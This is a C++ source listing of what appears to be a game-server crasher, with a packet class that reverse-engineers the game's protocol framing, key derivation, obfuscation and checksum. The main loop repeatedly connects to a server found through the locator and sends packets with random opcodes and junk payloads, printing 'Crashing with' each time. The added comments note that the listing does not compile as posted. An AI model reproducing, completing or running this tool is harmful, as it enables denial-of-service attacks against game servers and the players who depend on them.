Revolution.cpp
#include <stdio.h>
#include <Windows.h>
#include "Packet.h"
#pragma comment (lib, "WS2_32")
// Endpoint handed back by GetHostFromLocator(): the game host's IPv4 address as
// text plus its TCP port.  Instances are allocated with new and reached through
// LPHOST; the caller owns them.
struct Host
{
    char szIP[64];   // dotted-quad text as produced by inet_ntoa() (needs 16 bytes at most)
    short nPort;     // port in host byte order; main() applies htons() itself
};
typedef Host *LPHOST;
/*
 * Query the locator over UDP for the address of the game host and return it as a
 * heap-allocated Host (never deleted by the caller in this listing), or NULL.
 *
 * As posted this cannot return a host: nRecv is initialised to 0 and never
 * reassigned, and lpBuffer is allocated but never written to, so every iteration
 * takes the "Failed to connect" branch and sleeps 30 s.  "IP HERE" and
 * LOCATOR PORT HERE are placeholders the poster left in, so the function does
 * not compile as-is either.
 */
LPHOST GetHostFromLocator()
{
WSADATA wsaData;
WSAStartup (MAKEWORD (2,2), &wsaData); // return value not checked
LPHOST lpHost = new Host();
int nRecv = 0; // never updated below
PCHAR lpBuffer = new char[4096]; // response buffer; never freed on any return path
SOCKET fd = socket (AF_INET, SOCK_DGRAM, 0); // UDP socket; result unchecked, never closed
sockaddr_in sockAddr; // local address: filled in but no bind() call uses it
sockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
sockAddr.sin_port = htons (7900);
sockAddr.sin_family = AF_INET;
sockaddr_in serverAddr; // locator address
serverAddr.sin_addr.S_un.S_addr = inet_addr ("IP HERE"); // placeholder
serverAddr.sin_port = htons (LOCATOR PORT HERE); // placeholder, not valid C++
serverAddr.sin_family = AF_INET;
int nSize = sizeof(sockaddr); // unused
while (true)
{
sendto (fd, "\x64\x00\x0b\x00\x73\x00\x05\x00\x41\x9c\x00", 11, 0, (sockaddr *)&serverAddr, sizeof(sockaddr)); // fixed 11-byte query; result unchecked
if (nRecv < 1)
{
printf ("Failed to connect. Retrying\n");
Sleep (30000);
continue;
}
// Only 7 bytes are guaranteed by this check, yet offsets 23..30 are read below
// without comparing against nRecv -- the response is trusted as received.
if (nRecv > 6 && lpBuffer[0] == 100)
{
in_addr a;
memcpy (&a, lpBuffer+23, 4); // IPv4 address, bytes 23..26, as sent on the wire
int port = 0;
memcpy (&port, lpBuffer+27, 4); // 4-byte port field, bytes 27..30
strcpy (lpHost->szIP, inet_ntoa (a)); // at most 16 bytes, fits szIP[64]
lpHost->nPort = port; // int narrowed to short
return lpHost;
}
}
return NULL; // unreachable: the loop above has no break
}
/*
 * Entry point.  Loops forever: obtain a host from the locator, open a TCP
 * connection to it, send a single packet whose opcode is picked from packetIDs
 * and whose body is 64 bytes of 0xFF, then close and repeat after 50 ms.
 *
 * Defects visible in this listing (documented, not fixed):
 *  - lpPacket is used at lines 84-90 but is never declared or constructed here
 *    (Packet.h only defines the CPacket class), so the file does not compile as posted.
 *  - packetIDs is indexed with rand() % (sizeof(packetIDs)-1); sizeof yields the
 *    byte count (two per element), so most draws index past the end of the array
 *    (an out-of-bounds read).  rand() is never seeded.
 *  - lpKey is allocated and zeroed but never used.
 *  - lpHost is never deleted; the socket opened before the loop is overwritten
 *    without closesocket(), and on connect() failure the new socket leaks too.
 */
int main()
{
// Candidate opcodes (low-endian shorts written by CPacket::MakeCommand).
unsigned short packetIDs[] =
{
0x144, 0x145, 0x3F3, 0x3F4, 0x44D, 0x4BD, 0x4D1, 0x5AC, 0x57A, 0x52A, 0x522, 0x4C6, 0x584, 0x585, 0x5B6, 0x5DE, 0x6A5, 0x6A6, 0x6B8,
0x6A8, 0x6AA, 0x6b6, 0x70a, 0x70c, 0x178, 0x71E, 0x728, 0x72D, 0x607, 0x610, 0x623, 0x619, 0x61B, 0x770, 0x7E0, 0x7E8, 0x7EA, 0x7EB,
0x803, 0xC1C, 0x177E, 0x17A3, 0x17A6, 0x1FA, 0x5209, 0x520E, 0x17D8, 0x5217, 0x9C42, 0x1F45, 0x1F43, 0x1F44, 0x723
};
SOCKET fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); // replaced inside the loop without being closed
sockaddr_in sockAddr;
PBYTE lpBuffer; // receives the finalized frame from lpPacket
PCHAR lpTemp = "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"; // run of 0xFF; only the first 64 bytes are written below
PBYTE lpKey = new BYTE[32]; // unused
ZeroMemory (lpKey, 32);
while (true)
{
LPHOST lpHost = GetHostFromLocator();
if (lpHost == NULL)
{
Sleep (5000);
continue;
}
printf ("Connecting to: %s:%i\n", lpHost->szIP, lpHost->nPort);
fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
sockAddr.sin_addr.S_un.S_addr = inet_addr (lpHost->szIP);
sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons (lpHost->nPort);
if (connect (fd, (sockaddr *)&sockAddr, sizeof(sockaddr)) == SOCKET_ERROR)
{
continue; // fd is not closed here
}
unsigned short id = packetIDs[rand() % (sizeof(packetIDs)-1)]; // see header: modulo is a byte count, not an element count
printf ("Crashing with: %X\n", id);
lpPacket->MakeCommand (id, 0); // lpPacket: undeclared in this listing
lpPacket->WriteData(lpTemp, 64);
lpBuffer = lpPacket->FinalizePacket (100); // version 100 (0x64): no Encrypt() pass is applied
send (fd, (PCHAR)lpBuffer, lpPacket->mSize+8, 0); // 8 = header size prepended by FinalizePacket; lpBuffer is never delete[]'d
printf ("Sent Packet.\n");
closesocket (fd);
delete lpPacket;
Sleep (50);
}
}
Packet.h
/* -----------------------------------------
File: Packet.h
Usage: Contains the full packet class for reading / writing to the initial buffer.
Author: Phail
-----------------------------------------*/
/*
 * CPacket -- builder / parser for one frame of the game protocol.
 *
 * Frame layout produced by FinalizePacket():
 *   [0..1] version   [2..3] total length (mSize + 8)   [4..5] checksum
 *   [6..7] mSize + 2   [8..]  mData (mSize bytes)
 * When the version is 0x65 the length field and everything from offset 6 on are
 * passed through Encrypt() (per-byte XOR with mKey, 3-bit left rotate, XOR 0xF0)
 * before the checksum is computed; the checksum slot itself is never encrypted.
 *
 * mSize is both the write cursor while building and the read cursor while
 * parsing.  No member records the capacity of mData, so none of the Write*/Read*
 * calls can bounds-check: the caller (and, when parsing, the peer) is trusted.
 *
 * Ownership: mData is released with free() by the destructor.  FinalizePacket()
 * and ReadArray() hand back new[]-allocated buffers and ReadString() a
 * C-allocated one; all three belong to the caller.
 *
 * The original spelled the byte type as `byte` (the Windows SDK typedef for
 * unsigned char); it is written out as unsigned char here so the class stands alone.
 */
class CPacket
{
public:
    unsigned char *mData;     // command + payload only; the 8-byte header lives in FinalizePacket()'s output
    unsigned char mKey[32];   // key stream for Encrypt()/Decrypt()
    short mSize;              // cursor: bytes written so far, or current read offset

    /*
     * Derive mKey from the first 16 bytes of pPacket: bytes 12..15 go first,
     * then bytes 0..11, XORed with a fixed 16-byte mask; bytes 16..31 are a
     * fixed suffix (the original annotates it "GameNao!").  Returns mKey.
     */
    unsigned char *BuildKey(char *pPacket)
    {
        static const unsigned char kMask[16] = {
            0x57, 0x02, 0x5B, 0x04, 0x34, 0x06, 0x01, 0x08,
            0x37, 0x0A, 0x12, 0x69, 0x41, 0x38, 0x0F, 0x78
        };
        static const unsigned char kSuffix[16] = {
            0x37, 0x04, 0x5D, 0x2E, 0x43, 0x38, 0x49, 0x53,
            0x50, 0x05, 0x13, 0xC9, 0x28, 0xA4, 0x4D, 0x05
        };
        memcpy(mKey, pPacket + 12, 4);
        memcpy(mKey + 4, pPacket, 12);
        memcpy(mKey + 16, kSuffix, 16);
        // XOR is byte-wise, so a per-byte loop equals the original's 4-byte-word XOR.
        for (int i = 0; i < 16; ++i)
        {
            mKey[i] ^= kMask[i];
        }
        return mKey;
    }

    /*
     * Obfuscate iLength bytes of szBuffer starting at iStart, in place.
     * The key index is i (not iStart + i), so the key stream restarts at
     * every call.  Each byte: XOR key, rotate left by 3, XOR 0xF0.
     */
    void Encrypt(unsigned char *szBuffer, int iStart, int iLength)
    {
        for (int i = 0; i < iLength; ++i)
        {
            unsigned char x = (unsigned char)(szBuffer[iStart + i] ^ mKey[i % 32]);
            // The original builds this rotate from a 16-bit shift and two masks.
            unsigned char rotated = (unsigned char)((x << 3) | (x >> 5));
            szBuffer[iStart + i] = (unsigned char)(rotated ^ 0xF0);
        }
    }

    /*
     * Exact inverse of Encrypt() for the same iStart/iLength: XOR 0xF0,
     * rotate right by 3, XOR key (key index again starts at 0 per call).
     */
    void Decrypt(unsigned char *szBuffer, int iStart, int iLength)
    {
        for (int i = 0; i < iLength; ++i)
        {
            unsigned char x = (unsigned char)(szBuffer[iStart + i] ^ 0xF0);
            unsigned char rotated = (unsigned char)((x >> 3) | (x << 5));
            szBuffer[iStart + i] = (unsigned char)(rotated ^ mKey[i % 32]);
        }
    }

    /*
     * Frame checksum: (sum of bytes 6..iLength-1) - (sum of the 4 bytes at
     * iStart), with the carry above 16 bits folded back in.  Note that the
     * body sum starts at absolute offset 6 regardless of iStart, as in the
     * original.  Not a cryptographic integrity check -- any party can recompute it.
     */
    unsigned short Checksum(unsigned char *szBuffer, int iStart, int iLength)
    {
        unsigned int head = 0;
        for (int i = 0; i < 4; ++i)
        {
            head += szBuffer[iStart + i];
        }
        unsigned int body = 0;
        for (int i = 6; i < iLength; ++i)
        {
            body += szBuffer[i];
        }
        unsigned int folded = body - head;   // wraps (unsigned) when head > body
        folded += folded >> 16;
        return (unsigned short)folded;
    }

    /*
     * Append pLength bytes at the cursor.  A NULL pData means "append pLength
     * zero bytes" (a no-op for pLength <= 0, matching the original loop).
     * No capacity check: the caller must know mData is large enough.
     */
    void WriteData(void *pData, short pLength)
    {
        if (pData == 0)
        {
            if (pLength > 0)
            {
                memset(mData + mSize, 0, (size_t)pLength);
                mSize = (short)(mSize + pLength);
            }
            return;
        }
        memcpy(mData + mSize, pData, (size_t)pLength);
        mSize += pLength;
    }

    /* Append a 2-byte length (terminator included, native byte order) followed by the string and its NUL. */
    void WriteString(char *szBuffer)
    {
        short wSize = (short)(strlen(szBuffer) + 1);
        WriteData(&wSize, 2);
        WriteData(szBuffer, wSize);
    }

    /* Read a native-order short at the cursor and advance by 2. */
    short ReadShort()
    {
        short value = 0;
        memcpy(&value, mData + mSize, 2);
        mSize += 2;
        return value;
    }

    /*
     * Read a length-prefixed string (see WriteString) into a freshly C-allocated,
     * zero-filled buffer of exactly that length; the caller frees it.  The length
     * comes from the buffer itself and is not checked against what remains.
     */
    char *ReadString()
    {
        short wSize = ReadShort();
        char *szString = (char *)calloc(1, (size_t)wSize);   // zeroed, like the original malloc+memset
        memcpy(szString, mData + mSize, (size_t)wSize);
        mSize += wSize;
        return szString;
    }

    /* Read one byte at the cursor and advance by 1. */
    unsigned char ReadByte()
    {
        return mData[mSize++];
    }

    /*
     * Read 4 bytes at the cursor into a long and advance by 4.  Only 4 bytes
     * are copied; where long is wider the remaining bytes stay zero (which
     * half they occupy depends on the platform's byte order).
     */
    long ReadLong()
    {
        long value = 0;
        memcpy(&value, mData + mSize, 4);
        mSize += 4;
        return value;
    }

    /* Copy iSize bytes at the cursor into a new[]-allocated array (caller deletes []) and advance. */
    unsigned char *ReadArray(short iSize)
    {
        unsigned char *copy = new unsigned char[iSize]();   // value-initialised, i.e. zeroed
        memcpy(copy, mData + mSize, (size_t)iSize);
        mSize += iSize;
        return copy;
    }

    /*
     * Length of the byte run starting at the cursor and ending at (and including)
     * the first zero byte before iLast, or iLast - mSize if there is none.
     * Returns 0 when iLast <= mSize.  The cursor is not moved.
     */
    short GetLen(int iLast)
    {
        short count = 0;
        for (int pos = mSize; pos < iLast; ++pos)
        {
            ++count;
            if (mData[pos] == 0)
            {
                break;
            }
        }
        return count;
    }

    /* Move the cursor by wSize (may be negative). */
    void SkipByte(short wSize)
    {
        mSize = (short)(mSize + wSize);
    }

    /* Set the cursor to an absolute offset. */
    void SetPos(short pVal)
    {
        mSize = pVal;
    }

    /* Append a native-order short at the cursor. */
    void WriteShort(short pIn)
    {
        memcpy(mData + mSize, &pIn, 2);
        mSize += 2;
    }

    /*
     * Write the 3-byte command prefix -- opcode (2 bytes) then val -- at the
     * start of mData.  The cursor is advanced by 3, not reset, so on a fresh
     * packet (mSize == 0) the payload follows directly.
     */
    void MakeCommand(short wCommand, unsigned char val)
    {
        memcpy(mData, &wCommand, 2);
        mData[2] = val;
        mSize += 3;
    }

    /*
     * Build the complete frame (layout in the class comment) into a new[]
     * buffer of mSize + 8 bytes, which the caller owns.  For wVersion 0x65 the
     * length field and the tail from offset 6 are obfuscated with Encrypt()
     * before the checksum is taken; the checksum is computed with its own slot
     * still zero and then stored at offset 4.
     */
    unsigned char *FinalizePacket(unsigned short wVersion)
    {
        unsigned short wLen = (unsigned short)(mSize + 8);
        unsigned short wLen2 = (unsigned short)(mSize + 2);
        const bool obfuscate = (wVersion == 0x65);
        unsigned char *szPacket = new unsigned char[wLen]();   // zero-filled: bytes 4..5 start as 0
        memcpy(szPacket, &wVersion, 2);
        memcpy(szPacket + 2, &wLen, 2);
        if (obfuscate)
        {
            Encrypt(szPacket, 2, 2);
        }
        memcpy(szPacket + 6, &wLen2, 2);
        memcpy(szPacket + 8, mData, mSize);
        if (obfuscate)
        {
            Encrypt(szPacket, 6, mSize + 2);
        }
        unsigned short wChecksum = Checksum(szPacket, 0, wLen);
        memcpy(szPacket + 4, &wChecksum, 2);
        return szPacket;
    }

    /* Writer: zeroed pLen-byte buffer, cursor at 0, key copied in. */
    CPacket(int pLen, unsigned char pKey[32])
    {
        mData = (unsigned char *)calloc(1, (size_t)pLen);
        mSize = 0;
        memcpy(mKey, pKey, 32);
    }

    /* Reader: private copy of pSize bytes of pDecrypted, cursor at pStart.  mKey is left unset. */
    CPacket(unsigned char *pDecrypted, short pStart, short pSize)
    {
        mData = (unsigned char *)calloc(1, (size_t)pSize);
        memcpy(mData, pDecrypted, (size_t)pSize);
        mSize = pStart;
    }

    /*
     * Key-only constructor.  NOTE(review): mData and mSize are left
     * uninitialised, as in the original, and the destructor still calls
     * free(mData) -- only safe if mData is assigned before destruction.
     */
    CPacket(unsigned char pKey[32])
    {
        memcpy(mKey, pKey, 32);
    }

    /* Default constructor: nothing is initialised (same caveat as above). */
    CPacket()
    {
    }

    /* Releases mData (allocated with the C allocator) and clears the cursor. */
    ~CPacket()
    {
        free((void *)mData);
        mSize = 0;
    }
};
Credits to Phail.